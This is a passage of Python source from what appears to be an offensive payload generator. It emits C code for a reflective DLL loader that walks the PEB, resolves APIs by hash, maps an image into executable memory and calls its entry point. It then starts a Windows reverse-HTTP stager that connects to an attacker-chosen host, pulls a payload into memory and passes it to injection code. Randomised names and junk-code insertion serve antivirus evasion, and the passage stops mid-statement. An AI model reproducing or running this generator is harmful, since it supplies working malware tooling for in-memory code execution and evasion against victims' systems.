    Ret_code += "if( " + RandHValue + " == 0xEC0E4E8E || " + RandHValue + " == 0x7C0DFCAA || " + RandHValue + " == 0x91AFCA54){\n"
    Ret_code += RandArrAddr + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfFunctions);\n"
    Ret_code += RandArrAddr + " += (*(WORD *)( " + RandOrdName + ") * sizeof(DWORD));\n"
    Ret_code += "if( " + RandHValue + " == 0xEC0E4E8E ){\n"
    Ret_code += RandLoadLib + " = (" + RandLoadLibDef + ")( " + RandBaseAddr + " + *(DWORD *)( " + RandArrAddr + " ));\n"
    Ret_code += "}else if( " + RandHValue + " == 0x7C0DFCAA ){\n"
    Ret_code += RandGetProcAddr + " = (" + RandGetProcAddrDef + ")(" + RandBaseAddr + " + *(DWORD *)( " + RandArrAddr + "));\n"
    Ret_code += "}else if( " + RandHValue + " == 0x91AFCA54 ){\n"
    Ret_code += RandVirtualAlloc + " = (" + RandVirtualAllocDef + ")(" + RandBaseAddr + " + *(DWORD *)(" + RandArrAddr + "));}\n"
    Ret_code += Randflag + "--;}\n"
    Ret_code += RandArrName + " += sizeof(DWORD);\n"
    Ret_code += RandOrdName + " += sizeof(WORD);}\n"
    # 0x3CFA685D is NTDLLDLL_HASH in the commented defines; one export is
    # looked up there, 0x534C0AB8 (NTFLUSHINSTRUCTIONCACHE_HASH).
    Ret_code += "}else if((DWORD)" + RandUint3 + " == 0x3CFA685D){\n"
    Ret_code += RandBaseAddr + " = (ULONG_PTR)((PLDR_DATA_TABLE_ENTRY)" + RandUint1 + ")->DllBase;\n"
    Ret_code += RandExportDir + " = " + RandBaseAddr + " + ((PIMAGE_DOS_HEADER)" + RandBaseAddr + ")->e_lfanew;\n"
    Ret_code += RandArrName + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];\n"
    Ret_code += RandExportDir + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandArrName + ")->VirtualAddress);\n"
    Ret_code += RandArrName + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfNames);\n"
    Ret_code += RandOrdName + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfNameOrdinals);\n"
    Ret_code += Randflag + " = 1;\n"
    Ret_code += "while(" + Randflag + " > 0){\n"
    Ret_code += RandHValue + " = hash((char *)(" + RandBaseAddr + " + *(DWORD *)(" + RandArrName + ")));\n"
    Ret_code += "if( " + RandHValue + " == 0x534C0AB8 ){\n"
    Ret_code += RandArrAddr + " = (" + RandBaseAddr + " + ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->AddressOfFunctions);\n"
    Ret_code += RandArrAddr + " += (*(WORD *)(" + RandOrdName + ") * sizeof(DWORD));\n"
    Ret_code += "if( " + RandHValue + " == 0x534C0AB8){\n"
    Ret_code += RandNtFlushCache + " = (" + RandNtFlushInstrCacheDef + ")(" + RandBaseAddr + " + *(DWORD *)(" + RandArrAddr + "));}\n"
    Ret_code += Randflag + "--;}\n"
    Ret_code += RandArrName + " += sizeof(DWORD);\n"
    Ret_code += RandOrdName + " += sizeof(WORD);}}\n"
    # Stop walking modules once all four pointers are set; otherwise
    # follow the list link to the next entry.
    Ret_code += "if(" + RandLoadLib + " && " + RandGetProcAddr + " && " + RandVirtualAlloc + " && " + RandNtFlushCache + " ) break;\n"
    Ret_code += RandUint1 + " = *(UINT_PTR *)(" + RandUint1 + ");}\n"
    # Stage 2: allocate SizeOfImage bytes as PAGE_EXECUTE_READWRITE and
    # copy the PE headers into the new region.
    Ret_code += RandHeader + " = " + RandDllAddr + " + ((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_lfanew;\n"
    Ret_code += RandBaseAddr + " = (ULONG_PTR)" + RandVirtualAlloc + "(NULL,((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );\n"
    Ret_code += RandUint1 + " = ((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.SizeOfHeaders;\n"
    Ret_code += RandUint2 + " = " + RandDllAddr + ";\n"
    Ret_code += RandUint3 + " = " + RandBaseAddr + ";\n"
    Ret_code += "while( " + RandUint1 + "-- )\n"
    Ret_code += "*(BYTE *)" + RandUint3 + "++ = *(BYTE *)" + RandUint2 + "++;\n"
    # Stage 3: copy each section from its raw file offset to its virtual
    # address in the new region, byte by byte.
    Ret_code += RandUint1 + " = ((ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader + ((PIMAGE_NT_HEADERS)" + RandHeader + ")->FileHeader.SizeOfOptionalHeader );\n"
    Ret_code += RandUint5 + " = ((PIMAGE_NT_HEADERS)" + RandHeader + ")->FileHeader.NumberOfSections;\n"
    Ret_code += "while(" + RandUint5 + "--){\n"
    Ret_code += RandUint2 + " = (" + RandBaseAddr + " + ((PIMAGE_SECTION_HEADER)" + RandUint1 + ")->VirtualAddress);\n"
    Ret_code += RandUint3 + " = (" + RandDllAddr + " + ((PIMAGE_SECTION_HEADER)" + RandUint1 + ")->PointerToRawData);\n"
    Ret_code += RandUint4 + " = ((PIMAGE_SECTION_HEADER)" + RandUint1 + ")->SizeOfRawData;\n"
    Ret_code += "while(" + RandUint4 + "--)\n"
    Ret_code += "*(BYTE *)" + RandUint2 + "++ = *(BYTE *)" + RandUint3 + "++;\n"
    Ret_code += RandUint1 + " += sizeof(IMAGE_SECTION_HEADER);}\n"
    # Stage 4: walk the import descriptors, load each named DLL through
    # the resolved LoadLibrary pointer and fill the thunk table, by
    # ordinal via the export table or by name via GetProcAddress.
    Ret_code += RandUint2 + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];\n"
    Ret_code += RandUint3 + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandUint2 + ")->VirtualAddress);\n"
    Ret_code += "while(((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->Name){\n"
    Ret_code += RandDllAddr + " = (ULONG_PTR)" + RandLoadLib + "((LPCSTR)( " + RandBaseAddr + " + ((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->Name));\n"
    Ret_code += RandUint4 + " = (" + RandBaseAddr + " + ((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->OriginalFirstThunk);\n"
    Ret_code += RandUint1 + " = (" + RandBaseAddr + " + ((PIMAGE_IMPORT_DESCRIPTOR)" + RandUint3 + ")->FirstThunk);\n"
    Ret_code += "while(*(UINT_PTR *)(" + RandUint1 + ")){\n"
    Ret_code += "if(" + RandUint4 + " && ((PIMAGE_THUNK_DATA)" + RandUint4 + ")->u1.Ordinal & IMAGE_ORDINAL_FLAG){\n"
    Ret_code += RandExportDir + " = " + RandDllAddr + " + ((PIMAGE_DOS_HEADER)" + RandDllAddr + ")->e_lfanew;\n"
    Ret_code += RandArrName + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandExportDir + ")->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];\n"
    Ret_code += RandExportDir + " = (" + RandDllAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandArrName + ")->VirtualAddress);\n"
    Ret_code += RandArrAddr + " = (" + RandDllAddr + " + ((PIMAGE_EXPORT_DIRECTORY )" + RandExportDir + ")->AddressOfFunctions);\n"
    Ret_code += RandArrAddr + " += ((IMAGE_ORDINAL(((PIMAGE_THUNK_DATA)" + RandUint4 + ")->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY)" + RandExportDir + ")->Base) * sizeof(DWORD));\n"
    Ret_code += "*(UINT_PTR *)(" + RandUint1 + ") = (" + RandDllAddr + " + *(DWORD *)(" + RandArrAddr + "));\n"
    Ret_code += "}else{\n"
    Ret_code += RandUint2 + " = (" + RandBaseAddr + " + *(UINT_PTR *)(" + RandUint1 + "));\n"
    Ret_code += "*(UINT_PTR *)(" + RandUint1 + ") = (ULONG_PTR)" + RandGetProcAddr + "((HMODULE)" + RandDllAddr + ",(LPCSTR)((PIMAGE_IMPORT_BY_NAME)" + RandUint2 + ")->Name);}\n"
    Ret_code += RandUint1 + " += sizeof(ULONG_PTR);\n"
    Ret_code += "if(" + RandUint4 + "){\n"
    Ret_code += RandUint4 + " += sizeof(ULONG_PTR);}}\n"
    Ret_code += RandUint3 + " += sizeof(IMAGE_IMPORT_DESCRIPTOR);}\n"
    # Stage 5: compute the delta between the new base and the preferred
    # ImageBase and apply it to every base-relocation entry, handling the
    # DIR64, HIGHLOW, HIGH and LOW relocation types.
    Ret_code += RandDllAddr + " = " + RandBaseAddr + " - ((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.ImageBase;\n"
    Ret_code += RandUint2 + " = (ULONG_PTR)&((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];\n"
    Ret_code += "if( ((PIMAGE_DATA_DIRECTORY)" + RandUint2 + ")->Size ){\n"
    Ret_code += RandUint3 + " = (" + RandBaseAddr + " + ((PIMAGE_DATA_DIRECTORY)" + RandUint2 + ")->VirtualAddress);\n"
    Ret_code += "while(((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->SizeOfBlock ){\n"
    Ret_code += RandUint1 + " = (" + RandBaseAddr + " + ((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->VirtualAddress);\n"
    Ret_code += RandUint2 + " = (((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof( IMAGE_RELOC );\n"
    Ret_code += RandUint4 + " = " + RandUint3 + " + sizeof(IMAGE_BASE_RELOCATION);\n"
    Ret_code += "while(" + RandUint2 + "--){\n"
    Ret_code += "if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_DIR64){\n"
    Ret_code += "*(ULONG_PTR *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += " + RandDllAddr + ";\n"
    Ret_code += "}else if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_HIGHLOW){\n"
    Ret_code += "*(DWORD *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += (DWORD)" + RandDllAddr + ";\n"
    # Original marker "ARMQUI": presumably marks where ARM relocation
    # handling would go - unclear, confirm with the author.
    Ret_code += "}else if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_HIGH){\n"
    Ret_code += "*(WORD *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += HIWORD(" + RandDllAddr + ");\n"
    Ret_code += "}else if(((PIMAGE_RELOC)" + RandUint4 + ")->type == IMAGE_REL_BASED_LOW){\n"
    Ret_code += "*(WORD *)(" + RandUint1 + " + ((PIMAGE_RELOC)" + RandUint4 + ")->offset) += LOWORD(" + RandDllAddr + ");}\n"  #RIGHT??
    Ret_code += RandUint4 + " += sizeof( IMAGE_RELOC );}\n"
    Ret_code += RandUint3 + " = " + RandUint3 + " + ((PIMAGE_BASE_RELOCATION)" + RandUint3 + ")->SizeOfBlock;}}\n"
    # Stage 6: flush the instruction cache for the current process and
    # call the image entry point with DLL_PROCESS_ATTACH.
    Ret_code += RandUint1 + " = (" + RandBaseAddr + " + ((PIMAGE_NT_HEADERS)" + RandHeader + ")->OptionalHeader.AddressOfEntryPoint);\n"
    Ret_code += RandNtFlushCache + "((HANDLE)-1, NULL, 0);\n"
    Ret_code += "((DLLMAIN)" + RandUint1 + ")((HINSTANCE)" + RandBaseAddr + ", DLL_PROCESS_ATTACH, NULL);\n"

    #Ret_code += "$:END\n"

    #Ret_code = JunkInjector(Ret_code,ModOpt["JI"],ModOpt["JF"],ModOpt["EF"],ModOpt["JR"])

    # The generated function returns the entry-point address.
    Ret_code += "return " + RandUint1 + ";}\n"

    WriteSource("ReflectiveLoader.c", Ret_code)

    # ---- Header file: everything below is emitted as fixed text apart
    # from the four randomized typedef names. The include guard and the
    # DEREF / *_HASH macros of the original header are commented out, so
    # the .c body above carries the hash constants as literals.
    Ret_code = ""
    #    Ret_code += "#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H\n"
    #    Ret_code += "#define _REFLECTIVEDLLINJECTION_REFLECTIVELOADER_H\n"
    Ret_code += "#define WIN32_LEAN_AND_MEAN\n"
    Ret_code += "#include <winsock2.h>\n"
    Ret_code += "#include <windows.h>\n"
    Ret_code += "#include <intrin.h>\n"
    Ret_code += "#define DLL_QUERY_HMODULE		6\n"
    #    Ret_code += "#define DEREF( name )*(UINT_PTR *)(name)\n"
    #    Ret_code += "#define DEREF_64( name )*(DWORD64 *)(name)\n"
    #    Ret_code += "#define DEREF_32( name )*(DWORD *)(name)\n"
    #    Ret_code += "#define DEREF_16( name )*(WORD *)(name)\n"
    #    Ret_code += "#define DEREF_8( name )*(BYTE *)(name)\n"

    Ret_code += "typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID );\n"
    Ret_code += "typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );\n"

    Ret_code += "#define DLLEXPORT  __declspec( dllexport )\n"

    # Function-pointer typedefs under the randomized names chosen above.
    Ret_code += "typedef HMODULE (WINAPI * " + RandLoadLibDef + ")( LPCSTR );\n"
    Ret_code += "typedef FARPROC (WINAPI * " + RandGetProcAddrDef + ")( HMODULE, LPCSTR );\n"
    Ret_code += "typedef LPVOID  (WINAPI * " + RandVirtualAllocDef + ")( LPVOID, SIZE_T, DWORD, DWORD );\n"
    Ret_code += "typedef DWORD  (NTAPI * " + RandNtFlushInstrCacheDef + ")( HANDLE, PVOID, ULONG );\n"

    #    Ret_code += "#define KERNEL32DLL_HASH				0x6A4ABC5B\n"
    #    Ret_code += "#define NTDLLDLL_HASH				0x3CFA685D\n"

    #    Ret_code += "#define LOADLIBRARYA_HASH				0xEC0E4E8E\n"
    #    Ret_code += "#define GETPROCADDRESS_HASH				0x7C0DFCAA\n"
    #    Ret_code += "#define VIRTUALALLOC_HASH				0x91AFCA54\n"
    #    Ret_code += "#define NTFLUSHINSTRUCTIONCACHE_HASH	                0x534C0AB8\n"
    Ret_code += "#define HASH_KEY						13\n"

    Ret_code += "#pragma intrinsic( _rotr )\n"

    # ror(): rotate right by HASH_KEY bits. hash(): rotate-and-add over a
    # NUL-terminated string. Both names are fixed, not randomized.
    Ret_code += "__forceinline DWORD ror( DWORD d )\n"
    Ret_code += "{\n"
    Ret_code += "	return _rotr( d, HASH_KEY );\n"
    Ret_code += "}\n"

    Ret_code += "__forceinline DWORD hash( char * c )\n"
    Ret_code += "{\n"
    Ret_code += "    register DWORD h = 0;\n"
    Ret_code += "	do\n"
    Ret_code += "	{\n"
    Ret_code += "		h = ror( h );\n"
    Ret_code += "        h += *c;\n"
    Ret_code += "	} while( *++c );\n"
    Ret_code += "    return h;\n"
    Ret_code += "}\n"
    # Local definitions of the loader structures the .c body casts to.
    Ret_code += "typedef struct _UNICODE_STR\n"
    Ret_code += "{\n"
    Ret_code += "  USHORT Length;\n"
    Ret_code += "  USHORT MaximumLength;\n"
    Ret_code += "  PWSTR pBuffer;\n"
    Ret_code += "} UNICODE_STR, *PUNICODE_STR;\n"

    # This entry layout starts at InMemoryOrderModuleList, matching the
    # list the generated code walks.
    Ret_code += "typedef struct _LDR_DATA_TABLE_ENTRY\n"
    Ret_code += "{\n"
    Ret_code += "LIST_ENTRY InMemoryOrderModuleList;\n"
    Ret_code += "LIST_ENTRY InInitializationOrderModuleList;\n"
    Ret_code += "PVOID DllBase;\n"
    Ret_code += "PVOID EntryPoint;\n"
    Ret_code += "ULONG SizeOfImage;\n"
    Ret_code += "UNICODE_STR FullDllName;\n"
    Ret_code += "	UNICODE_STR BaseDllName;\n"
    Ret_code += "	ULONG Flags;\n"
    Ret_code += "	SHORT LoadCount;\n"
    Ret_code += "	SHORT TlsIndex;\n"
    Ret_code += "	LIST_ENTRY HashTableEntry;\n"
    Ret_code += "	ULONG TimeDateStamp;\n"
    Ret_code += "} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;\n"

    Ret_code += "typedef struct _PEB_LDR_DATA\n"
    Ret_code += "{\n"
    Ret_code += "   DWORD dwLength;\n"
    Ret_code += "   DWORD dwInitialized;\n"
    Ret_code += "   LPVOID lpSsHandle;\n"
    Ret_code += "   LIST_ENTRY InLoadOrderModuleList;\n"
    Ret_code += "   LIST_ENTRY InMemoryOrderModuleList;\n"
    Ret_code += "   LIST_ENTRY InInitializationOrderModuleList;\n"
    Ret_code += "   LPVOID lpEntryInProgress;\n"
    Ret_code += "} PEB_LDR_DATA, * PPEB_LDR_DATA;\n"

    Ret_code += "typedef struct _PEB_FREE_BLOCK\n"
    Ret_code += "{\n"
    Ret_code += "   struct _PEB_FREE_BLOCK * pNext;\n"
    Ret_code += "   DWORD dwSize;\n"
    Ret_code += "} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;\n"

    # Only the pLdr member of this PEB layout is dereferenced by the
    # generated .c body.
    Ret_code += "typedef struct __PEB\n"
    Ret_code += "{\n"
    Ret_code += "   BYTE bInheritedAddressSpace;\n"
    Ret_code += "   BYTE bReadImageFileExecOptions;\n"
    Ret_code += "   BYTE bBeingDebugged;\n"
    Ret_code += "   BYTE bSpareBool;\n"
    Ret_code += "   LPVOID lpMutant;\n"
    Ret_code += "   LPVOID lpImageBaseAddress;\n"
    Ret_code += "   PPEB_LDR_DATA pLdr;\n"
    Ret_code += "   LPVOID lpProcessParameters;\n"
    Ret_code += "   LPVOID lpSubSystemData;\n"
    Ret_code += "   LPVOID lpProcessHeap;\n"
    Ret_code += "   PRTL_CRITICAL_SECTION pFastPebLock;\n"
    Ret_code += "   LPVOID lpFastPebLockRoutine;\n"
    Ret_code += "   LPVOID lpFastPebUnlockRoutine;\n"
    Ret_code += "   DWORD dwEnvironmentUpdateCount;\n"
    Ret_code += "   LPVOID lpKernelCallbackTable;\n"
    Ret_code += "   DWORD dwSystemReserved;\n"
    Ret_code += "   DWORD dwAtlThunkSListPtr32;\n"
    Ret_code += "   PPEB_FREE_BLOCK pFreeList;\n"
    Ret_code += "   DWORD dwTlsExpansionCounter;\n"
    Ret_code += "   LPVOID lpTlsBitmap;\n"
    Ret_code += "   DWORD dwTlsBitmapBits[2];\n"
    Ret_code += "   LPVOID lpReadOnlySharedMemoryBase;\n"
    Ret_code += "   LPVOID lpReadOnlySharedMemoryHeap;\n"
    Ret_code += "   LPVOID lpReadOnlyStaticServerData;\n"
    Ret_code += "   LPVOID lpAnsiCodePageData;\n"
    Ret_code += "   LPVOID lpOemCodePageData;\n"
    Ret_code += "   LPVOID lpUnicodeCaseTableData;\n"
    Ret_code += "   DWORD dwNumberOfProcessors;\n"
    Ret_code += "   DWORD dwNtGlobalFlag;\n"
    Ret_code += "   LARGE_INTEGER liCriticalSectionTimeout;\n"
    Ret_code += "   DWORD dwHeapSegmentReserve;\n"
    Ret_code += "   DWORD dwHeapSegmentCommit;\n"
    Ret_code += "   DWORD dwHeapDeCommitTotalFreeThreshold;\n"
    Ret_code += "   DWORD dwHeapDeCommitFreeBlockThreshold;\n"
    Ret_code += "   DWORD dwNumberOfHeaps;\n"
    Ret_code += "   DWORD dwMaximumNumberOfHeaps;\n"
    Ret_code += "   LPVOID lpProcessHeaps;\n"
    Ret_code += "   LPVOID lpGdiSharedHandleTable;\n"
    Ret_code += "   LPVOID lpProcessStarterHelper;\n"
    Ret_code += "   DWORD dwGdiDCAttributeList;\n"
    Ret_code += "   LPVOID lpLoaderLock;\n"
    Ret_code += "   DWORD dwOSMajorVersion;\n"
    Ret_code += "   DWORD dwOSMinorVersion;\n"
    Ret_code += "   WORD wOSBuildNumber;\n"
    Ret_code += "   WORD wOSCSDVersion;\n"
    Ret_code += "   DWORD dwOSPlatformId;\n"
    Ret_code += "   DWORD dwImageSubsystem;\n"
    Ret_code += "   DWORD dwImageSubsystemMajorVersion;\n"
    Ret_code += "   DWORD dwImageSubsystemMinorVersion;\n"
    Ret_code += "   DWORD dwImageProcessAffinityMask;\n"
    Ret_code += "   DWORD dwGdiHandleBuffer[34];\n"
    Ret_code += "   LPVOID lpPostProcessInitRoutine;\n"
    Ret_code += "   LPVOID lpTlsExpansionBitmap;\n"
    Ret_code += "   DWORD dwTlsExpansionBitmapBits[32];\n"
    Ret_code += "   DWORD dwSessionId;\n"
    Ret_code += "   ULARGE_INTEGER liAppCompatFlags;\n"
    Ret_code += "   ULARGE_INTEGER liAppCompatFlagsUser;\n"
    Ret_code += "   LPVOID lppShimData;\n"
    Ret_code += "   LPVOID lpAppCompatInfo;\n"
    Ret_code += "   UNICODE_STR usCSDVersion;\n"
    Ret_code += "   LPVOID lpActivationContextData;\n"
    Ret_code += "   LPVOID lpProcessAssemblyStorageMap;\n"
    Ret_code += "   LPVOID lpSystemDefaultActivationContextData;\n"
    Ret_code += "   LPVOID lpSystemAssemblyStorageMap;\n"
    Ret_code += "   DWORD dwMinimumStackCommit;\n"
    Ret_code += "} _PEB, * _PPEB;\n"

    # One base-relocation entry: 12-bit offset and 4-bit type.
    Ret_code += "typedef struct\n"
    Ret_code += "{\n"
    Ret_code += "	WORD	offset:12;\n"
    Ret_code += "	WORD	type:4;\n"
    Ret_code += "} IMAGE_RELOC, *PIMAGE_RELOC;\n"
    #    Ret_code += "#endif\n"

    WriteSource("ReflectiveLoader.h", Ret_code)
def RevHttpStager_C_windows(ModOpt):
    """Generate the C source of a Windows reverse-HTTP stager and write it to Source.c.

    This function only builds text. It concatenates C statements into one
    string, passes that string through JunkInjector and hands the result to
    WriteSource. Nothing is compiled or executed here.

    The emitted program initialises Winsock, resolves ModOpt["Lhost"],
    connects to ModOpt["Lport"], sends a single HTTP/1.1 GET, reads the
    response in 1024-byte recv() calls into the buffer named by
    ModOpt["Buff"], skips past the first CRLF CRLF (end of the HTTP
    headers) and passes the remainder to the code emitted by
    inject_utils.Win_LocalThread or inject_utils.Win_RemoteInjection.

    Args:
        ModOpt: option dict. Keys read here: "Lhost", "Lport", "MemAlloc",
            "ExecMethod", "Arch", "Outformat", "Reflective" (only when
            "Outformat" is "dll"), "DynImport", "JI", "JF", "EF", "JR".
            "Lhost" and "Lport" are concatenated into strings, so both
            must be str. Keys written here: "Buff", "Lpvoid", "Decoder",
            "Bufflen", and "NtdllHandle"/"Ker32Handle" when "DynImport"
            is true. The dict is mutated in place and then passed to the
            WindowsDefend and inject_utils helpers.

    Returns:
        None. The generated source is written with WriteSource("Source.c", ...).

    Analyst notes (all visible in the emitted text below): the request is
    plain-text HTTP with a fixed Internet Explorer 11 style User-Agent, a
    "Connection: Keep-Alive" header and a Host header of the form
    "<Lhost>:<Lport>". The program sleeps 300 ms after sending, and the
    response body is consumed in memory rather than written to disk.
    """

    # Lhost is the CheckForBackslash()-processed host and is used only in the
    # Host header; gethostbyname() below receives the raw ModOpt["Lhost"].
    Lhost = CheckForBackslash(ModOpt["Lhost"])
    Lport = ModOpt["Lport"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # Fresh identifiers for every C variable declared in the emitted program.
    # Randlpv2 is not referenced again in this function.
    Randlpv = varname_creator()
    Randlpv2 = varname_creator()
    Randpointer2 = varname_creator()
    Randbuff = varname_creator()
    Randversion = varname_creator()
    Randwsadata = varname_creator()
    RandRevtarget = varname_creator()
    Randsock = varname_creator()
    RandSocket = varname_creator()
    RandRecv_int = varname_creator()

    # MemAlloc and ExecMethod are re-read with the same values as above;
    # Arch is not used again in this function.
    Arch = ModOpt["Arch"]
    MemAlloc = ModOpt["MemAlloc"]
    ExecMethod = ModOpt["ExecMethod"]

    # "Buff" is always the receive buffer name. "Lpvoid" is a separate name
    # only for the shared-section allocator; how inject_utils uses the two
    # names is not visible here.
    if ModOpt["MemAlloc"] in ["SharedSection", "SS"]:

        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = varname_creator()
    else:
        ModOpt["Buff"] = Randlpv
        ModOpt["Lpvoid"] = Randlpv

    # The string "False" (not the bool) is the "no decoder" sentinel;
    # ShellInject_C_windows compares against the same string.
    ModOpt["Decoder"] = "False"

    # Fixed size as a string; presumably the allocation size consumed by
    # inject_utils.Win_MemLocal -- confirm against that helper.
    ModOpt["Bufflen"] = "1000000"

    Ret_code = ""
    # winsock2.h is emitted ahead of the shuffled list, which contains windows.h.
    Ret_code += "#define _WIN32_WINNT 0x0500\n"
    Ret_code += "#include <winsock2.h>\n"

    IncludeList = [
        "#include <stdlib.h>\n", "#include <windows.h>\n",
        "#include <stdio.h>\n", "#include <string.h>\n", "#include <time.h>\n",
        "#include <math.h>\n"
    ]

    Ret_code += IncludeShuffler(IncludeList) + "#include <tlhelp32.h>\n"

    # Entry point: main() for an executable, DllMain() gated on
    # DLL_PROCESS_ATTACH for a DLL. Any other "Outformat" emits no entry point.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        if ModOpt["Reflective"] == True:

            Ret_code += "#include \"ReflectiveLoader.h\"\n"

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"

    # "$:START", "$:EVA" and "$:END" are marker lines inside the generated
    # text; presumably JunkInjector consumes them -- confirm in that helper.
    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "char * " + Randlpv + ";\n"
    Ret_code += "WORD " + Randversion + " = MAKEWORD(2,2);WSADATA " + Randwsadata + ";\n"

    if ModOpt["DynImport"] == True:

        # This replaces the handle names stored in ModOpt a few lines above
        # and emits a second pair of GetModuleHandle declarations. Only
        # WSAStartup and WSACleanup are resolved through GetProcAddress;
        # the remaining Winsock calls below are emitted as direct calls.
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        WS2_32 = varname_creator()
        NdcWSAStartup = varname_creator()
        NdcWSACleanup = varname_creator()
        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + WS2_32 + " = GetModuleHandle(\"ws2_32.dll\");\n"
        Ret_code += "FARPROC " + NdcWSAStartup + " = GetProcAddress(" + WS2_32 + ", \"WSAStartup\");\n"
        Ret_code += "FARPROC " + NdcWSACleanup + " = GetProcAddress(" + WS2_32 + ", \"WSACleanup\");\n"
        Ret_code += "if (" + NdcWSAStartup + "(" + Randversion + ", &" + Randwsadata + ") < 0){"
        Ret_code += NdcWSACleanup + "();exit(1);}\n"
    else:

        Ret_code += "if (WSAStartup(" + Randversion + ", &" + Randwsadata + ") < 0){\n"
        Ret_code += "WSACleanup();exit(1);}\n"

    Ret_code += "struct hostent * " + RandRevtarget + ";struct sockaddr_in " + Randsock + ";SOCKET " + RandSocket + ";\n"
    Ret_code += RandSocket + " = socket(AF_INET, SOCK_STREAM, 0);\n"

    # The INVALID_SOCKET check is emitted only in the DynImport variant.
    if ModOpt["DynImport"] == True:

        Ret_code += "if (" + RandSocket + " == INVALID_SOCKET){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"

    # Name resolution uses ModOpt["Lhost"] exactly as supplied.
    Ret_code += RandRevtarget + " = gethostbyname(\"" + ModOpt[
        "Lhost"] + "\");\n"  #Lhost

    if ModOpt["DynImport"] == True:

        Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");" + NdcWSACleanup + "();exit(1);}\n"
    else:
        Ret_code += "if (" + RandRevtarget + " == NULL){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"

    Ret_code += "memcpy(&" + Randsock + ".sin_addr.s_addr, " + RandRevtarget + "->h_addr, " + RandRevtarget + "->h_length);\n"
    Ret_code += Randsock + ".sin_family = AF_INET;\n"
    Ret_code += Randsock + ".sin_port = htons((" + ModOpt[
        "Lport"] + "));\n"  #Lport
    Ret_code += "if ( connect(" + RandSocket + ", (struct sockaddr *)&" + Randsock + ", sizeof(" + Randsock + ")) ){closesocket(" + RandSocket + ");WSACleanup();exit(1);}\n"
    # The whole request is one 400-byte char array. The path comes from
    # UriGenerator() (not shown here); every header value is a literal.
    Ret_code += "char " + Randbuff + "[400] = \"GET /" + UriGenerator(
